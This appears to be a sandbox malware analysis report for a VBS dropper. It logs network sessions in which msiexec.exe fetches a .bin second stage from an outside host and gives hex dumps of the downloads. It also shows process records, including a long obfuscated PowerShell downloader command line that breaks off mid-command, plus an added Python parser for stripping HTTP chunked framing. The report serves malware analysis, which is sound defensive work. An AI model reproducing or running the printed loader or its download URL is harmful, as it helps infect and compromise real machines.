2024-12-17 07:29:31 UTC | 1369 | IN | Data Raw: 35 61 38 0d 0a 7a 47 48 50 74 67 70 34 41 66 39 57 34 48 58 77 34 57 56 50 4c 45 2b 62 66 4a 67 42 35 43 6e 78 4d 4b 49 55 52 6e 68 52 43 71 43 45 78 65 54 68 39 53 4b 72 43 71 37 33 6a 42 41 38 6f 79 5a 70 6b 61 43 31 36 76 2f 6c 35 44 63 48 69 73 77 74 51 6a 47 6a 6b 66 58 51 38 59 6a 52 4f 56 63 78 37 78 6e 46 31 44 45 32 37 48 6c 57 6e 7a 7a 36 56 48 2f 4c 5a 5a 46 6c 53 6d 33 2f 6c 5a 48 2f 56 72 30 59 6d 78 46 6d 53 4b 78 30 64 57 7a 6f 41 65 52 5a 38 55 43 73 4f 6e 37 65 32 43 34 57 31 34 47 42 48 4b 4d 57 39 57 38 6f 36 6a 32 63 6f 6d 30 58 4a 38 79 74 2f 73 64 50 62 65 54 6f 42 77 61 56 7a 50 33 42 66 79 45 34 4b 61 66 62 48 6c 2b 59 35 36 45 6d 37 47 6d 55 62 38 46 61 6c 35 70 4a 34 63 2f 2f 67 61 44 70 77 6b 6d 6a 68 43 66 69 7a 68 78 78 31 56
Data Ascii: 5a8zGHPtgp4Af9W4HXw4WVPLE+bfJgB5CnxMKIURnhRCqCExeTh9SKrCq73jBA8oyZpkaC16v/l5DcHiswtQjGjkfXQ8YjROVcx7xnF1DE27HlWnzz6VH/LZZFlSm3/lZH/Vr0YmxFmSKx0dWzoAeRZ8UCsOn7e2C4W14GBHKMW9W8o6j2com0XJ8yt/sdPbeToBwaVzP3BfyE4KafbHl+Y56Em7GmUb8Fal5pJ4c//gaDpwkmjhCfizhxx1V
2024-12-17 07:29:31 UTC | 86 | IN | Data Raw: 52 65 62 31 53 7a 49 4f 76 51 6b 2b 2b 59 59 71 30 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 43 53 6c 57 4b 6e 32 63 5a 4f 53 62 50 58 49 6f 6b 57 4b 44 6c 41 57 55 37 49 61 76 73 0d 0a
Data Ascii: Reb1SzIOvQk++YYq0cl6WeHJelnhyXpZ4cl6WeHJelnhyXpZ4cl6WeHCSlWKn2cZOSbPXIokWKDlAWU7Iavs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49815 | 172.67.210.11 | 443 | 8088 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:30:17 UTC | 182 | OUT | GET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: ig2c.icu
Cache-Control: no-cache
2024-12-17 07:30:17 UTC | 860 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 07:30:17 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Last-Modified: Tue, 17 Dec 2024 07:30:17 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cGaf%2BHBy3jQEJGXXO5DutuMrowbjrHGmMe%2B6KX2fLeC%2FwS3GnP%2BqmMDVg6Ae%2BJxw8WSD9spmwQougGELnTmctjHc9UIOAtg1qDlvMLEzea7F0Gq%2BFHxerGjEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3534fafe2042e5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1703&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=820&delivery_rate=1688837&cwnd=221&unsent_bytes=0&cid=c828a3a157d4dd2b&ts=694&x=0"
2024-12-17 07:30:17 UTC | 509 | IN | Data Raw: 33 38 63 36 0d 0a 9c 71 72 35 6a d7 63 bb 2b 53 a6 e7 dc 79 19 c5 b5 74 78 6a ad 23 f6 27 6c e1 e2 46 5e f5 1f 56 aa c6 5b 54 6c 5e 9b b8 7b ac 9a 86 0e 92 7a 33 c9 f7 55 af e4 fc 4a 54 59 2e fc 30 bd 83 6c 61 f4 1a d0 c8 90 64 4b 04 87 78 3a f1 ee 9d 40 2a d5 c2 b2 c5 ff 54 00 fa d0 d2 ee ba a6 7f 4a df 5f e4 da 83 26 0d 5d 2c 4a e8 a6 f9 0a 7b cb 43 7b bf 9e ab fa 76 a4 4c e3 31 5f 38 0c a7 d6 2b e0 49 36 9d ea c5 80 7d f8 fe 1a 12 67 0f 1e e0 1e 11 6c fc 8a 7d c1 94 f3 57 07 84 aa 89 d8 f0 28 79 68 c1 28 24 1d a5 98 8b 70 4f 1b 15 47 f2 6b af 6d 40 d5 21 63 3b b6 ea b2 ed 5e b2 4d e8 10 48 09 4a 37 97 a4 c0 25 7e 43 15 6a 6f e3 2b ea 22 f3 da e9 bf fd d2 46 21 c1 a5 55 eb 4d b3 5a e0 1b 3f b0 c7 39 80 18 77 a5 17 02 90 a7 22 c7 99 be 94 ef 8b 43 65 07
Data Ascii: 38c6qr5jc+Sytxj#'lF^V[Tl^{z3UJTY.0ladKx:@*TJ_&],J{C{vL1_8+I6}gl}W(yh($pOGkm@!c;^MHJ7%~Cjo+"F!UMZ?9w"Ce
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: 2b 34 b0 aa 90 5f e7 3c 77 8b 27 93 60 90 67 f0 11 ce 7a 57 0f ec 03 60 0a ae a3 30 40 c6 48 ab 08 b6 25 24 aa 56 fe ee 60 21 86 c7 a7 17 41 bb 4d 70 56 0d 9f c6 0c 76 3c 82 38 a1 b6 93 88 f9 a2 54 2a 31 58 1c fa 94 29 4d 7f c0 3f 2f 4c 17 52 1f 8a 32 7f a2 5f fe 5b 80 48 3b 58 b4 e1 7f da f7 3a 47 5c d7 45 d4 3f bb 7d 10 70 7b 7e f9 76 84 16 83 ed b9 8b 4a e1 07 70 5e d2 16 16 3e b7 c7 61 24 b6 26 b7 58 d8 f1 9b 6b 1c bf fc ec 6a 6e 3c d1 3f 4e 62 e8 76 ea a7 8e 51 58 77 ec cd ba 3f 01 c6 df 61 a6 0c 02 60 8a 8f 39 6a f1 4c ec fa 5f 54 f3 b1 f8 58 b5 fd ef 05 9a b3 25 bd 80 ce 67 31 27 98 fc 5e 86 12 10 91 58 d1 79 da d6 a6 ee ed e2 93 1d c3 1b ea 51 0e 7a 2c 1c ef ef 67 c7 89 8b 65 d1 9f 6b 7b 9f 9d 64 f5 2f 58 1e f5 6e 32 3e fe c1 d8 8f 8b ef f0 13 e1
Data Ascii: +4_<w'`gzW`0@H%$V`!AMpVv<8T*1X)M?/LR2_[H;X:G\E?}p{~vJp^>a$&Xkjn<?NbvQXw?a`9jL_TX%g1'^XyQz,gek{d/Xn2>
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: b0 c4 ff ef 05 f2 4c a2 f8 80 26 85 05 24 98 a5 9d 3f a2 44 d6 18 39 22 16 f8 d2 ea 87 63 d6 1d 2b de de 52 0e 23 9f a2 0f bb 22 c7 61 15 96 d7 9f 03 58 1e d8 64 1d 99 6c 1d f5 37 f1 c7 86 94 5f a1 04 01 94 77 92 e5 41 09 2b a2 01 eb 45 6a 09 8e e3 cd 00 32 9e 3f 75 01 79 1c 2f 92 1c cd fe 7a aa b2 15 56 de a9 26 0d dd 89 7a 50 dd 0b ae 28 75 41 74 39 51 71 68 78 b4 63 9f ca 01 1c 89 f2 28 55 8c f9 56 11 7a 74 90 6a 27 4b 22 63 6b ca 7d 45 84 3a c6 a3 24 e1 4e 14 93 82 0a de d0 58 71 45 51 03 6e 30 20 63 f6 40 8b 56 b7 8e d9 7d f1 64 bc 10 6c ac 1b a6 ca 86 8e 86 37 15 57 87 29 e7 86 0c 6f 70 e6 d1 fe 5b 9b d1 ea 87 95 2c 1a 8c 81 d7 cb 01 7b a5 85 de 97 76 93 8b 2f 86 1b d6 d1 30 56 9b 71 8f f8 47 d8 bc 7a 85 a7 c3 99 62 91 31 71 7c b9 41 2d aa b1 48 9a
Data Ascii: L&$?D9"c+R#"aXdl7_wA+Ej2?uy/zV&zP(uAt9Qqhxc(UVztj'K"ck}E:$NXqEQn0 c@V}dl7W)op[,{v/0VqGzb1q|A-H
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: 61 a3 19 2d 0d 8a ea 42 f6 ab 41 b8 07 c8 83 44 c3 e5 fd d0 ca b3 83 0c 84 6b 49 32 cf 7f 9d be 43 a7 43 9b ac 1f 98 bf 2c 86 3c 3a d6 78 6a 9b 71 31 77 8e f2 bf 12 75 1b 56 f2 cd 68 fd 2b 09 fa d1 ce 25 91 4b b4 3b 0b 7c 2c 7b 31 55 20 fc 89 b5 d8 b8 1f 6f 50 e3 1d 19 72 d6 66 a7 14 74 fd 25 f9 b0 ef 71 cb a0 95 7b 71 f1 f5 82 cc 07 8b eb 85 00 c4 48 8b 2e 66 a0 4d b7 a6 74 65 6d cf a7 5b 44 68 87 cc b4 66 0a af a0 2c fb bf cf 17 e8 ef 95 a0 64 bf dd ec fa 8c ce 98 c4 cc 7d f5 69 9f ed 7f 91 f1 0f b3 1c 4c df 61 58 00 d1 81 83 54 5b 00 2c 42 a8 a3 46 ac 24 0d ec 9d b2 1c d8 71 4f 2f 88 3c f4 f5 a0 ca 80 5c f8 35 ae 99 57 82 35 a8 50 0f 6d aa fc f0 10 86 37 66 ff 90 fa 56 88 43 f7 fd 2a d4 8b 81 d6 00 ae fa 59 2b 78 88 82 94 b0 df 45 ab 10 38 c1 e6 d2 f6
Data Ascii: a-BADkI2CC,<:xjq1wuVh+%K;|,{1U oPrft%q{qH.fMtem[Dhf,d}iLaXT[,BF$qO/<\5W5Pm7fVC*Y+xE8
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: a4 46 21 38 7f f6 67 e6 b5 f2 36 c2 2e 20 90 24 f5 a0 22 58 23 ff 35 23 85 25 10 45 13 16 0f e0 ab 94 6c 00 6e 2e 8f 1a 85 44 de fb 8f 27 fb 6e 7b c1 69 a2 fc b9 43 26 0b 2e 2e 3c 84 17 14 61 d4 05 54 55 4b 74 5a 16 d3 d1 e1 bf 8a c1 7f f2 53 83 08 db ca 7e e3 aa 17 d9 e6 fd b8 6a 38 12 97 63 96 49 89 b0 a5 0b d1 89 db 90 ea 2b ba 23 a6 9d e3 33 0a fe 91 e8 f8 2a 76 3d 1a 93 92 ff ea a0 18 c1 5e b6 8f 30 1d b0 33 42 e3 81 df f6 5a e5 75 5e b0 43 70 d0 ae 21 be 3c 30 e6 c7 86 c0 5e 5e ce 71 62 47 a8 0e ba cc dd 7c 7a 4e 37 31 b5 b0 6d e4 c1 42 20 bb 25 ff cb 53 c7 3b db aa f2 7b 44 40 20 5f 66 4b 04 4f 91 eb f3 11 62 f8 6d 13 87 b2 2d f3 08 05 fa c1 81 b8 ed 2f 1a ba 61 07 a9 9d 83 ad c3 b5 b0 48 e8 a6 a8 e2 8d c9 43 7b 3b 5e df d8 f5 c1 b0 e3 60 d4 f6 fc
Data Ascii: F!8g6. $"X#5#%Eln.D'n{iC&..<aTUKtZS~j8cI+#3*v=^03BZu^Cp!<0^^qbG|zN71mB %S;{D@ _fKObm-/aHC{;^`
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: 44 da 1f c9 a3 c3 3c d3 21 b8 f5 64 4c 98 7b 46 4f 04 83 f3 7e d5 19 3c 82 2e 6d 91 e7 93 a8 df 7c de 84 59 37 31 69 97 0e db 5f e4 51 6b ad c2 de 51 4a e0 d5 da e2 9c 35 bc 84 34 96 ea ab fd 6b a4 06 cc a0 c7 44 2d 1d c3 33 ab 73 6c ba 99 de 42 26 b9 98 9a a6 c5 62 60 ba 9f b3 73 73 e2 2d 2d c4 d2 e4 1a 34 18 e6 77 56 54 0a a4 51 06 e3 00 50 63 e0 90 a0 d1 dc 3a 69 cd 09 25 78 0a 6e ba 5d 02 28 13 a1 4d c6 23 97 c3 59 f6 81 72 8d 35 7b ef 5e e2 32 9d e1 56 16 a4 5f f1 b2 2e e4 c6 ba cd e4 52 aa 19 10 33 59 99 60 1f bb 86 2d fa 59 95 8b 4d 4f 8a 27 d7 e0 57 fd b9 4d 3c 96 1b e2 ad 7d cd 7d c4 9d 8e 1f 86 b0 aa d0 70 45 dc b7 d8 41 d8 1e 7f e7 ee 8d 63 e5 21 99 2a 5f 11 0e ae eb 2d 02 02 a0 1a d3 47 6d 3f 45 b1 69 91 fa 12 f5 a1 8b 3e ab 6a ae 0b 8a e2 cf
Data Ascii: D<!dL{FO~<.m|Y71i_QkQJ54kD-3slB&b`ss--4wVTQPc:i%xn](M#Yr5{^2V_.R3Y`-YMO'WM<}}pEAc!*_-Gm?Ei>j
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: 8e a3 9c 27 df ba 4d e1 78 e4 1d 7f fc 10 cd 31 b2 08 4e 0d 28 c9 78 65 17 da cb 5b ee cc 25 b0 2b 6d ba 67 32 a7 b9 3a a2 ca 19 da cb 39 52 26 44 4a 8d 01 34 87 7a 73 69 63 c9 6e 0a 41 83 b5 fb 6a b9 3f f3 f5 33 f1 8f d3 e1 97 f2 41 a8 a0 92 57 bd 68 26 42 65 4f 63 57 4a a7 37 4e 88 62 2b c2 b0 5d c1 36 5a 8e 0b 65 38 19 d8 46 61 25 33 64 19 b0 d8 a4 5a c2 72 bd 1a 93 d4 4c a9 f5 d6 44 bf c2 fd 32 73 c2 f8 0b 6c e0 ac bd 49 6c 01 f3 df 66 60 e8 ed ca 95 e0 92 35 06 4e 6b e6 30 18 87 62 5c 3c ca 57 12 4d 5f 61 2b 5f 53 b1 0a 4d 38 ec 36 cd cc 6d 46 be 3f 10 df 9a 20 00 07 4d 8b 2f 88 7e a3 b8 23 fa 20 cd e8 8b 40 b7 76 ea e6 99 14 0b f1 e4 1a c7 83 0b e2 a4 ce dd cf a6 92 c7 51 2d ea 89 1f 88 09 c4 4f 1f e9 e3 61 7e 0b ab 63 ed eb a0 50 0b 06 9f 6c 47 51
Data Ascii: 'Mx1N(xe[%+mg2:9R&DJ4zsicnAj?3AWh&BeOcWJ7Nb+]6Ze8Fa%3dZrLD2slIlf`5Nk0b\<WM_a+_SM86mF? M/~# @vQ-Oa~cPlGQ
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: cd e1 5a bb 5b 3d bb 92 65 4c 09 bc 18 80 d7 1e c7 97 3d 4d 1d 22 a1 78 f4 fa 0e 23 77 8d 07 77 44 ad 77 71 c8 b1 3a ca 7c d2 a5 d0 d0 78 61 65 7d 0c a3 4f 75 6d 5e 97 1b 30 4c 6d 5d e5 a3 02 94 b1 8d bb e9 c8 35 c8 33 a8 35 aa 0f ef d6 0d 6c e9 3c 50 c7 91 68 a8 18 7b 24 80 b1 6c 40 e3 18 ee 31 f9 93 03 2e 0b 60 e3 b0 a3 30 40 97 a0 b5 08 52 f6 7b 68 4a fe 07 47 a9 55 c1 f6 bf 59 bb 4d 70 0f cf 9b c6 e5 5d 3c 82 a8 1c 1c 39 27 f3 61 df 66 15 5c f5 d5 94 29 4d f4 8c 1b 2b a5 3b 52 1f 8a 58 7e c8 5d 01 2f 8a 30 b6 c0 27 1e 80 59 c6 47 80 58 d7 3f d5 55 ba f0 61 54 77 92 34 91 7b e9 00 29 b5 49 4e e1 bf 8f a1 2d 49 d5 bd 1f 16 d0 13 82 04 5d 82 53 c4 b5 e1 d7 57 fa 1c 95 91 cd 1b b4 be fc 2e 83 15 58 05 2d 7c 63 c7 3d 31 f0 e9 70 6a 9e 59 77 ea 72 c3 70 97
Data Ascii: Z[=eL=M"x#wwDwq:|xae}Oum^0Lm]535l<Ph{$l@1.`0@R{hJGUYMp]<9'af\)M+;RX~]/0'YGX?UaTw4{)IN-I]SW.X-|c=1pjYwrp
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: d4 3f bb 5f 98 3d 6b 92 90 76 84 16 d3 60 fc 83 1a 6c 4a 7c b6 b3 36 16 3e 87 64 56 bc 5c 9c 86 b0 a9 dc 1d 95 4c 32 21 e1 82 22 46 d0 3f 1e 9f 23 9e 32 a4 8e 51 d3 b1 b2 46 5f 62 c3 d6 9f 0b 59 26 2c fb 9f df 48 3b 19 91 ac a7 5f 96 fb a1 16 6d 59 0c 10 8e de 67 27 36 89 f5 6f 3e b3 58 3e 5a 86 99 11 1a 54 f5 7d 31 f9 03 7a 5c e6 93 f4 2d ed 15 ae e7 fc 59 1b ef 64 64 4c c5 af 9f fc 9e a9 7f 9f 74 94 0a d0 a7 48 a2 e5 4e 5a ea 4a e9 f6 04 67 6a 88 6d 06 a2 0c ae d6 ca b4 05 4d 11 3f 7d 49 ff 74 4d 93 b9 cf 40 6b 4b c4 e3 d1 ed e7 10 c6 d9 c2 02 2d 23 54 1e 0a 88 e9 45 5e ba a3 c1 15 57 6c 02 f1 bc 0d 0e 9c 88 ce 11 07 02 65 b8 04 50 5a ee ee 19 f8 16 b2 cf 16 87 1d d1 41 f9 3b 90 b2 0b 73 a3 2c fc d8 43 09 60 55 b9 43 f4 39 9b e4 d5 bf 20 63 9e 3e 4e 37
Data Ascii: ?_=kv`lJ|6>dV\L2!"F?#2QF_bY&,H;_mYg'6o>X>ZT}1z\-YddLtHNZJgjmM?}ItM@kK-#TE^WlePZA;s,C`UC9 c>N7
2024-12-17 07:30:17 UTC | 1369 | IN | Data Raw: 55 d9 dd 5a c7 62 62 55 d5 23 df 4c 0a 88 36 d7 92 29 f9 f1 36 fa 96 0f 9a 76 df 91 86 94 fa 9a df 7a 75 6d 95 d8 a7 a9 96 42 41 d1 3b ac b2 08 05 d7 e0 74 c6 6d 7d 30 55 a7 80 af eb ae 14 50 c4 70 8b fe c8 f5 ec 34 a2 e8 1e c9 10 c1 cf 73 8d 29 38 7a ae 67 91 ed ab 5b bc c4 63 08 0c b6 13 0d e6 3e 0b 2a 4f ba 98 3c 3b f2 53 21 5b 35 ea 0a 47 48 bf 8b 76 d0 56 d3 79 41 d6 e3 66 51 34 33 8e 60 cb 89 54 1a 2b d9 79 1a 4e 64 89 bc 29 08 c6 b5 15 86 53 c5 b0 cd 4a c7 c6 64 55 43 77 4e c9 37 1e b6 4b 83 c9 dd 4c a0 b7 a9 fe 08 9d 9a 34 74 f5 74 64 2f 62 c3 87 8e 7a b7 0e 3b 02 c3 bb 25 2b f0 b6 7b f2 49 4a 57 48 53 59 1e 32 84 4f 8e d9 99 f3 88 11 5f b2 ab e8 2f ec d2 1b 7b 52 6c ae 99 ed 16 96 ec 12 85 d0 54 98 00 34 a5 3f c8 ee 4a 88 57 45 5c 6e 3f 70 c1 7c
Data Ascii: UZbbU#L6)6vzumBA;tm}0UPp4s)8zg[c>*O<;S![5GHvVyAfQ43`T+yNd)SJdUCwN7KL4ttd/bz;%+{IJWHSY2O_/{RlT4?JWE\n?p|
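Both downloads above were served with Transfer-Encoding: chunked and Connection: close, so the bytes in the Data Raw rows start with a chunk-size line (b4a and 38c6, hex) that is transport framing rather than payload; anyone carving the second stage out of a capture, or out of these rows, has to strip that framing before hashing or decoding it, or the result will never match the file the client actually received. The parser below is an added example written for this report; it is not code from Joe Sandbox or from the sample. It assumes the report prints only the first bytes of each packet (the Bytes transferred column is larger than any row shown), so a chunk that ends early is treated as a truncated tail and the parser reports how many bytes are still owed instead of failing. The two embedded rows are the first 32 bytes of the first Data Raw row of each session, copied from above; the short complete message is constructed to exercise the normal termination path.

```python
"""Strip HTTP/1.1 chunked transfer framing from the Data Raw rows of the
two sessions above. Added example for this report; not Joe Sandbox or
sample code.
"""


def hex_rows_to_bytes(rows: list[str]) -> bytes:
    """Join the space-separated hex rows of the report into raw bytes."""
    return bytes.fromhex(" ".join(rows))


def parse_chunked(data: bytes) -> dict:
    """Decode chunked framing from a possibly truncated byte string.

    Returns the payload seen so far, the chunk sizes read from the stream,
    whether the terminating zero-length chunk was reached, and how many
    bytes the last chunk still owes when the data stops early.
    """
    pos, payload, sizes = 0, bytearray(), []
    complete, missing = False, 0
    while pos < len(data):
        eol = data.find(b"\r\n", pos)
        if eol < 0:                      # chunk-size line itself is cut off
            break
        size_field = data[pos:eol].split(b";", 1)[0].strip()   # drop extensions
        if not size_field:
            break
        size = int(size_field, 16)
        sizes.append(size)
        pos = eol + 2
        if size == 0:                    # last-chunk marker; trailers may follow
            complete = True
            break
        chunk = data[pos:pos + size]
        payload += chunk
        if len(chunk) < size:            # the report truncated this packet
            missing = size - len(chunk)
            break
        pos += size + 2                  # skip the CRLF that ends every chunk
    return {"payload": bytes(payload), "chunk_sizes": sizes,
            "complete": complete, "missing": missing}


def printable_ratio(data: bytes) -> float:
    """Share of bytes in the printable ASCII range: a cheap way to tell the
    text-like first download from the opaque second one."""
    if not data:
        return 0.0
    return sum(0x20 <= b < 0x7F for b in data) / len(data)


# First 32 bytes of the first Data Raw row of each session, copied from above.
DEPLOY_ROW = ["62 34 61 0d 0a 36 77 4c 62 67 6e 45 42 6d 37 74 6f 2b 78 6b "
              "41 63 51 47 62 63 51 47 62 41 31 77"]
BIN_ROW = ["33 38 63 36 0d 0a 9c 71 72 35 6a d7 63 bb 2b 53 a6 e7 dc 79 "
           "19 c5 b5 74 78 6a ad 23 f6 27 6c e1"]

# Constructed complete message (two chunks, one with an extension, then the
# zero-length terminator) to show the normal end of a chunked body.
COMPLETE_MSG = b"3\r\nabc\r\n2;ext=1\r\nde\r\n0\r\n\r\n"


if __name__ == "__main__":
    for name, row in (("Blusterer.deploy", DEPLOY_ROW),
                      ("NywxkpRVdifOOuG4.bin", BIN_ROW)):
        r = parse_chunked(hex_rows_to_bytes(row))
        print(f"{name}: chunk sizes {r['chunk_sizes']}, "
              f"{len(r['payload'])} payload bytes seen, {r['missing']} still owed, "
              f"printable ratio {printable_ratio(r['payload']):.2f}")
```

The same function applied to a full packet capture (all chunks present, ending in the `0\r\n\r\n` terminator) returns `complete=True` and the exact bytes to hash; on the truncated rows of this report it returns `missing > 0`, which is the signal that the page alone cannot yield the second stage.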



Target ID: 0
Start time: 02:29:24
Start date: 17/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs"
Imagebase: 0x7ff6da7c0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 02:29:25
Start date: 17/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . 
enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo 
